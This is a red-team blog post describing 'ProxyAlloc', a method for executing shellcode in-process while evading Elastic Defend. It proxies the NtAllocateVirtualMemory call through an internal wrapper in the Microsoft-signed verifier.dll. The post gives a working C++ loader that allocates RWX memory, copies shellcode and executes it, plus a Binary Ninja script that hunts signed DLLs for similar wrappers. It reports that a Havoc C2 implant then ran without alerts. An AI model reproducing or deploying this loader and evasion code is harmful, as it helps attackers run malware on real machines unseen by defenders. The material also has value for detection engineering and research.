ProxyAlloc: evading NtAllocateVirtualMemory detection ft. Elastic Defend & Binary Ninja

In this article, we explore an evasion method for in-process shellcode execution. It is specifically designed to avoid detections that flag NtAllocateVirtualMemory calls made from unsigned DLLs.

Preface

Not long ago, one of my standard in-process shellcode execution methods for the Red Team engagements I have worked on looked similar to this:

DWORD protect{};
LPVOID virtualMemory = nullptr;
SIZE_T size = rawShellcodeLength;

this->api.NtAllocateVirtualMemory.call
(
    NtCurrentProcess(), &virtualMemory, 0, &size,
    MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE
);

this->api.RtlMoveMemory.call(virtualMemory, rawShellcode, rawShellcodeLength);

(*(int(*)()) virtualMemory)();

This method has variations, such as using additional NtProtectVirtualMemory calls to avoid allocating memory with RWX protections. Most of them should look familiar to you and usually take the following form:

PAGE_NOACCESS -> PAGE_READWRITE -> PAGE_EXECUTE_READ
PAGE_READWRITE -> PAGE_EXECUTE_READ
PAGE_READWRITE -> PAGE_EXECUTE

This is a well-known technique, but it is not often detected in a corporate environment where business processes prevail over security considerations (and usually, rightly so).

I was surprised, however, when I tried to launch my implant in a new lab with the Elastic Stack configured, Elastic Defend as the agent, and the most aggressive detection settings turned on.

Detection

Right when the implant was launched, I observed the following:

When I looked into the specifics of that detection, it became obvious that NtAllocateVirtualMemory / NtProtectVirtualMemory calls are being monitored:

After thinking about it for some time and discussing related evasion ideas with @zimnyaa (I suggest checking his blog at tishina.in), an idea came to mind.

Let us review the call stack when the NtAllocateVirtualMemory call happens:

Essentially, the call stack relevant to our objective at this point can be translated to the following:

unsigned_binary -> signed_ntdll_ZwAllocateVirtualMemory

What if we could place some signed module in between, to pretend that we are not directly calling NtAllocateVirtualMemory? It appears that we can.
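The call-stack reasoning above can be modelled with a toy check. This is only a sketch of the idea, not Elastic Defend's actual logic: the Frame type, the module names, and the assumption that only the immediate caller of the ntdll frame is inspected are all hypothetical.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Frame:
    module: str   # hypothetical module name for illustration
    signed: bool  # whether the module carries a valid signature


def immediate_caller_is_unsigned(stack):
    """Return True if the frame that directly calls the innermost frame is unsigned.

    `stack` is ordered from the outermost caller to the innermost frame
    (here, the ntdll stub). This models an ASSUMED check, nothing more.
    """
    if len(stack) < 2:
        return False
    return not stack[-2].signed


# unsigned_binary -> signed_ntdll_ZwAllocateVirtualMemory
direct = [Frame("unsigned_binary", False), Frame("ntdll.dll", True)]

# unsigned_binary -> signed module -> signed_ntdll_ZwAllocateVirtualMemory
proxied = [
    Frame("unsigned_binary", False),
    Frame("signed_dll", True),
    Frame("ntdll.dll", True),
]
```

In this model the direct stack is flagged while the proxied one is not, which is the gap the rest of the article relies on.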

Discovery

Multiple Microsoft-signed DLLs are present at C:\Windows\System32\*.

I decided to utilize Binary Ninja with its awesome Python API to scan every signed DLL there for functions that might serve as a wrapper for NtAllocateVirtualMemory.

The high-level overview of the search algorithm for any DLL is as follows:

  1. Check if NtAllocateVirtualMemory is imported by our target.

  2. If it is imported, check each of its call sites for the two special cases below.

  3. Mark the location if Protect and RegionSize arguments can be supplied through the caller function's parameters.

  4. Mark the location if RWX memory of more than 64KB is allocated.
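The two cases in steps 3 and 4 can be sketched as a small stand-alone filter. This is a simplified model that does not use the Binary Ninja API: each argument is represented as a hypothetical (kind, value) pair, where kind is "param" (a parameter of the wrapper function), "local" (any other variable), or "const".

```python
PAGE_EXECUTE_READWRITE = 0x40  # RWX protection constant
MIN_REGION_SIZE = 0x10000      # 64 KB


def is_candidate(protect, region_size):
    """Decide whether a call site is worth manual review.

    Both arguments are (kind, value) pairs; this representation is an
    assumption made for illustration only.
    """
    # Case 1: a variable argument must come from the wrapper's own parameters
    for kind, _ in (protect, region_size):
        if kind == "local":
            return False
    # Case 2: constant arguments must request RWX memory of more than 64 KB
    if protect[0] == "const" and protect[1] != PAGE_EXECUTE_READWRITE:
        return False
    if region_size[0] == "const" and region_size[1] <= MIN_REGION_SIZE:
        return False
    return True
```

For instance, a call site whose Protect and RegionSize both come from the wrapper's parameters passes the filter, while one that allocates a constant 64 KB or less does not.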

The script is as follows and could be improved to account for more valid cases:

import os
import binaryninja
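# The HLIL classes are referenced by their bare names below, so import them directly
from binaryninja.highlevelil import HighLevelILCall, HighLevelILVar, HighLevelILConst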

# File with all signed dll paths in C:\Windows\System32\*
signed_dlls_path = r'C:\Users\user\source\repos\SignedDllAnalyzer\signed_dlls.txt'

# Counting how many dlls are to be processed
with open(signed_dlls_path, "r") as f:
    signed_dlls = [dll.strip() for dll in f]

total_dlls = len(signed_dlls)

with open(signed_dlls_path, "r") as f:
	current_dll = 0
	# Processing each dll
	for signed_dll_path in f:
		current_dll += 1
		# Preparing variables for the progress bar
		signed_dll_path = signed_dll_path.strip()
		dll_name = signed_dll_path.split('\\')[-1]
		dll_size_mb = os.path.getsize(signed_dll_path) / 1024 / 1024
		progress = f"{current_dll}/{total_dlls}"
		# We don't want to process dlls with size more than 15 MB
		if dll_size_mb > 15:
			print(f"[-] [{progress}] [{dll_name}] [{dll_size_mb:.2f} > 15 MB]")
			continue
		# Update progress bar
		print(f"[*] [{progress}] [{dll_name}] [{dll_size_mb:.2f} MB]")
		# Open the dll in Binary Ninja without advanced analysis
		with binaryninja.load(signed_dll_path, update_analysis=False) as binary_view:
			# Check if NtAllocateVirtualMemory is imported by the dll
			ntAllocateVirtualMemorySymbol = binary_view.get_symbol_by_raw_name("NtAllocateVirtualMemory")
			# If it is not imported, we skip to the next dll
			if not ntAllocateVirtualMemorySymbol:
				continue
			else:
				# If it is imported, update progress and perform dll analysis
				print(f"[+] [{progress}] [{dll_name}] [NtAllocateVirtualMemory]")
				binary_view.set_analysis_hold(False)
				binary_view.update_analysis_and_wait()
				# Get all code references of the NtAllocateVirtualMemory call and process each one
				code_refs = binary_view.get_code_refs(ntAllocateVirtualMemorySymbol.address)
				for ref in code_refs:
					try:
						# Get the function which contains target code reference
						func = binary_view.get_functions_containing(ref.address)[0]
						# Get the HLIL (High Level IL) representation of the call site
						hlil_instr = func.get_llil_at(ref.address).hlil
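						# Specifically look for the NtAllocateVirtualMemory call;
						# reset hlil_call so a match from a previous reference is never reused
						hlil_call = None
						for operand in hlil_instr.operands:
							if isinstance(operand, HighLevelILCall):
								if operand.dest.value.value == ntAllocateVirtualMemorySymbol.address:
									hlil_call = operand
									break
						# Skip this reference if no matching call was found at the call site
						if hlil_call is None:
							continue
						# Process arguments of the NtAllocateVirtualMemory call (specifically Protect and RegionSize)
						args = hlil_call.params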
						protect = args[5]
						regionSize = args[3]
						# More cases could be added here (for example, variable SSA form analysis)
						# Case 1: arguments are directly supplied from wrapper function parameters
						if type(protect) == HighLevelILVar:
							if protect.var not in func.parameter_vars:
								continue
						if type(regionSize) == HighLevelILVar:
							if regionSize.var not in func.parameter_vars:
								continue
						# Case 2: arguments are constant
						if type(protect) == HighLevelILConst:
							if int(protect.value) != 0x40: # looking for RWX
								continue
						if type(regionSize) == HighLevelILConst:
							if int(regionSize.value) <= 0x10000: # looking for more than 64 KB
								continue
						# If reached here, update the progress to submit the finding for manual analysis
						print(f"[+] [{progress}] [{dll_name}] [{hex(ref.address)}] [{hlil_instr}]")
					except Exception as e:
						print(f"[x] [{progress}] [{dll_name}] [{e}]")

After running the script, we can observe multiple findings:

For example, both of those functions are essentially wrappers around NtAllocateVirtualMemory:

Curious readers might ask: if we call them instead of NtAllocateVirtualMemory, how is this different from calling kernel32.VirtualAlloc?

Two differences are relevant for us:

  1. VirtualAlloc is monitored by security solutions even more than NtAllocateVirtualMemory.

  2. It is an exported API function, while both functions above are internal to verifier.dll.

Other than that, yes, it is very similar to VirtualAlloc, which itself is a wrapper around NtAllocateVirtualMemory:

The technique itself: ProxyAlloc

I decided to call this method ProxyAlloc, as we are proxying our actual call to NtAllocateVirtualMemory through any Microsoft-signed DLL that has an internal wrapper around it.

The code for this technique is as follows (example with verifier.AVrfpNtAllocateVirtualMemory):

typedef NTSTATUS (*AVrfpNtAllocateVirtualMemory_t)
(
    HANDLE ProcessHandle,
    PVOID *BaseAddress,
    ULONG_PTR ZeroBits,
    ULONG_PTR *RegionSize,
    ULONG AllocationType,
    ULONG Protect
);

DWORD protect{};
LPVOID virtualMemory = nullptr;
SIZE_T size = rawShellcodeLength;

HMODULE hVerifierMod = this->api.LoadLibraryA.call("verifier.dll");

AVrfpNtAllocateVirtualMemory_t AVrfpNtAllocateVirtualMemory = (AVrfpNtAllocateVirtualMemory_t)((char*)hVerifierMod + 0x25110);
AVrfpNtAllocateVirtualMemory(NtCurrentProcess(), &virtualMemory, 0, &size, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);

this->api.RtlMoveMemory.call(virtualMemory, rawShellcode, rawShellcodeLength);

(*(int(*)()) virtualMemory)();

It also could be improved, for example, by using pattern scanning instead of plain offsets.

The call stack observed after using this method is:

This roughly corresponds to the following scheme, as expected:

unsigned_binary -> signed_dll_offset -> signed_ntdll_ZwAllocateVirtualMemory

Final Test

After testing this with an actual loader and modified Havoc (Demon agent shellcode) as our C2 of choice, Elastic Defend did not generate any alerts.
